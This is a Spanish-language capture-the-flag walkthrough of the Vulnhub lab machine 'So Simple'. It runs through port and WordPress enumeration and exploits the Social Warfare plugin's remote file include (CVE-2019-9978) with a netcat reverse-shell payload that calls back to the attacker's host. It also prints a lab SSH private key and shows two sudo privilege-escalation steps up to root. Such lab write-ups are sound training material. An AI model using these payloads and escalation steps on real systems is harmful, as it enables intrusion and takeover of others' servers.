[VULNHUB] So Simple

Hoy vamos a hackear la maquina de Vulnhub llamada So Simple.Podeis descargarla desde el siguiente enlace: So Simple

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.64
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 01:36 CEST
Nmap scan report for so-simple.home (192.168.1.64)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 
2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds
Exploramos mas en detalle el Apache para ver si encontramos alguna carpeta interesante.

~ > gobuster dir -u http://192.168.1.64/ -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.64/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/27 01:37:22 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/07/27 01:37:26 Finished
===============================================================
Vemos que aparentemente hay un wordpress instalado. Usamos wpscan para mirarlo mas en detalle.

~ > wpscan --url http://192.168.1.64/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.64/wordpress/ [192.168.1.64]
[+] Started: Mon Jul 27 01:38:56 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.64/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] http://192.168.1.64/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
http://192.168.1.64/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
http://192.168.1.64/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.64/wordpress/index.php/feed/, 
https://wordpress.org/?v=5.4.2
 |  - http://192.168.1.64/wordpress/index.php/comments/feed/, 
https://wordpress.org/?v=5.4.2

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/
 | Latest Version: 1.6 (up to date)
 | Last Updated: 2020-06-10T00:00:00.000Z
 | Readme: 
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/readme.txt
 | Style URL: 
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the 
block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - 
http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
, Match: 'Version: 1.6'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simple-cart-solution
 | Location: 
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/
 | Last Updated: 2020-02-21T23:06:00.000Z
 | [!] The version is out of date, the latest version is 1.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 0.2.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - 
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/assets/dis
t/js/public.js?ver=0.2.0
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt

[+] social-warfare
 | Location: http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2020-04-14T17:03:00.000Z
 | [!] The version is out of date, the latest version is 4.0.1
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | Version: 3.5.0 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.1.64/wordpress/, Match: 'Social Warfare v3.5.0'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/css/style
.min.css?ver=3.5.0
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/js/script
.min.js?ver=3.5.0
 |  Readme - Stable Tag (Aggressive Detection)
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - 
http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 
<===============================================================================
================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been 
output.
[!] You can get a free API token with 50 daily requests by registering at 
https://wpvulndb.com/users/sign_up

[+] Finished: Mon Jul 27 01:39:03 2020
[+] Requests Done: 54
[+] Cached Requests: 5
[+] Data Sent: 13.004 KB
[+] Data Received: 546.451 KB
[+] Memory used: 202.164 MB
[+] Elapsed time: 00:00:06

Exploitation


Encontramos el plugin social warfare, el cual esta desactualizado. Buscamos si tiene alguna vulnerabilidad y encontramos lo siguiente[1]. En /var/www/html creamos shell.txt:

<pre>
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.111 
1234 >/tmp/f");
</pre>
Ponemos nc a la escucha.

nc -nlvp 1234
Por ultimo visitamos: http://192.168.1.64/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp _url=http://192.168.1.111/shell.txt

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.129] 60010
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
En /home/max/.ssh encontramos una key privada ssh (id_rsa). La copiamos en nuestra maquina.

www-data@so-simple:/home/max/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
www-data@so-simple:/home/max/.ssh$ 
Le damos los permisos adecuados.

~ > nano key
~ > chmod 600 key
Utilizamos la key para conectarnos como max por ssh.

~ > ssh max@192.168.1.64 -i key
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Jul 27 20:01:31 UTC 2020

  System load:              0.09
  Usage of /:               56.6% of 8.79GB
  Memory usage:             31%
  Swap usage:               0%
  Processes:                136
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for enp0s3:  192.168.1.64
  IPv6 address for enp0s3:  2a01:c50e:21e3:0:a00:27ff:fed8:65bd

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$

user.txt



max@so-simple:~$ cat user.txt
073dafccfe902526cee753455ff1dbb0
Miramos si podemos hacer algo con sudo.

max@so-simple:~$ sudo -l
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
Vemos que podemos ejecutar service como "steven", Lo usamos para obtener los privilegios de steven.

max@so-simple:~$ sudo -u steven service ../../bin/bash
steven@so-simple:/$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)

user2.txt



steven@so-simple:/tmp$ cd ~
steven@so-simple:/home/steven$ ls
user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
Miramos si podemos hacer algo con sudo.

steven@so-simple:/$ sudo -l
Matching Defaults entries for steven on so-simple:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh

Privilege Escalation


Vemos que podemos ejecutar un script .sh el cual no existe. Procedemos a crear las carpetas necesarias y el script, el cual contendra "/bin/bash". Por ultimo le daremos permisos de ejecucion y lo ejecutaremos con sudo para obtener los privilegios de root.

steven@so-simple:/tmp$ mkdir -p /opt/tools/
steven@so-simple:/tmp$ echo "/bin/bash" > /opt/tools/server-health.sh
steven@so-simple:/tmp$ chmod +x /opt/tools/server-health.sh
steven@so-simple:/tmp$ sudo /opt/tools/server-health.sh
root@so-simple:/tmp#

flag.txt



root@so-simple:/tmp# cd /root
root@so-simple:~# ls
flag.txt  snap
root@so-simple:~# cat flag.txt 


  /$$$$$$                                                     /$$              
/$$                                   
 /$$__  $$                                                   | $$             | 
$$                                   
| $$  \__/  /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$  /$$$$$$  /$$$$$$  /$$$$$$$$| 
$$                                   
| $$       /$$__  $$| $$__  $$ /$$__  $$ /$$__  $$|____  $$|_  $$_/ |____ /$$/| 
$$                                   
| $$      | $$  \ $$| $$  \ $$| $$  \ $$| $$  \__/ /$$$$$$$  | $$      /$$$$/ 
|__/                                   
| $$    $$| $$  | $$| $$  | $$| $$  | $$| $$      /$$__  $$  | $$ /$$ /$$__/    
                                     
|  $$$$$$/|  $$$$$$/| $$  | $$|  $$$$$$$| $$     |  $$$$$$$  |  $$$$//$$$$$$$$ 
/$$                                   
 \______/  \______/ |__/  |__/ \____  $$|__/      \_______/   \___/ 
|________/|__/                                   
                               /$$  \ $$                                        
                                     
                              |  $$$$$$/                                        
                                     
                               \______/                                         
                                     
 /$$     /$$                  /$$                                               
                            /$$      
|  $$   /$$/                 | $/                                               
                           | $$      
 \  $$ /$$//$$$$$$  /$$   /$$|_//$$    /$$ /$$$$$$         /$$$$$$  /$$  /$$  
/$$ /$$$$$$$   /$$$$$$   /$$$$$$$      
  \  $$$$//$$__  $$| $$  | $$  |  $$  /$$//$$__  $$       /$$__  $$| $$ | $$ | 
$$| $$__  $$ /$$__  $$ /$$__  $$      
   \  $$/| $$  \ $$| $$  | $$   \  $$/$$/| $$$$$$$$      | $$  \ $$| $$ | $$ | 
$$| $$  \ $$| $$$$$$$$| $$  | $$      
    | $$ | $$  | $$| $$  | $$    \  $$$/ | $$_____/      | $$  | $$| $$ | $$ | 
$$| $$  | $$| $$_____/| $$  | $$      
    | $$ |  $$$$$$/|  $$$$$$/     \  $/  |  $$$$$$$      | $$$$$$$/|  
$$$$$/$$$$/| $$  | $$|  $$$$$$$|  $$$$$$$      
    |__/  \______/  \______/       \_/    \_______/      | $$____/  
\_____/\___/ |__/  |__/ \_______/ \_______/      
                                                         | $$                   
                                     
 /$$ /$$$$$$                   /$$$$$$  /$$              | $$       /$$         
 /$$                                 
| $//$$__  $$                 /$$__  $$|__/              |__/      | $$         
| $/                                 
|_/| $$  \__/  /$$$$$$       | $$  \__/ /$$ /$$$$$$/$$$$   /$$$$$$ | $$  
/$$$$$$|_/                                  
   |  $$$$$$  /$$__  $$      |  $$$$$$ | $$| $$_  $$_  $$ /$$__  $$| $$ /$$__  
$$                                    
    \____  $$| $$  \ $$       \____  $$| $$| $$ \ $$ \ $$| $$  \ $$| $$| 
$$$$$$$$                                    
    /$$  \ $$| $$  | $$       /$$  \ $$| $$| $$ | $$ | $$| $$  | $$| $$| 
$$_____/                                    
   |  $$$$$$/|  $$$$$$/      |  $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$|  
$$$$$$$                                    
    \______/  \______/        \______/ |__/|__/ |__/ |__/| $$____/ |__/ 
\_______/                                    
                                                         | $$                   
                                     
                                                         | $$                   
                                     
                                                         |__/                   
                                     

Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79

End


Y con esto ya seriamos root de la maquina [1] https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/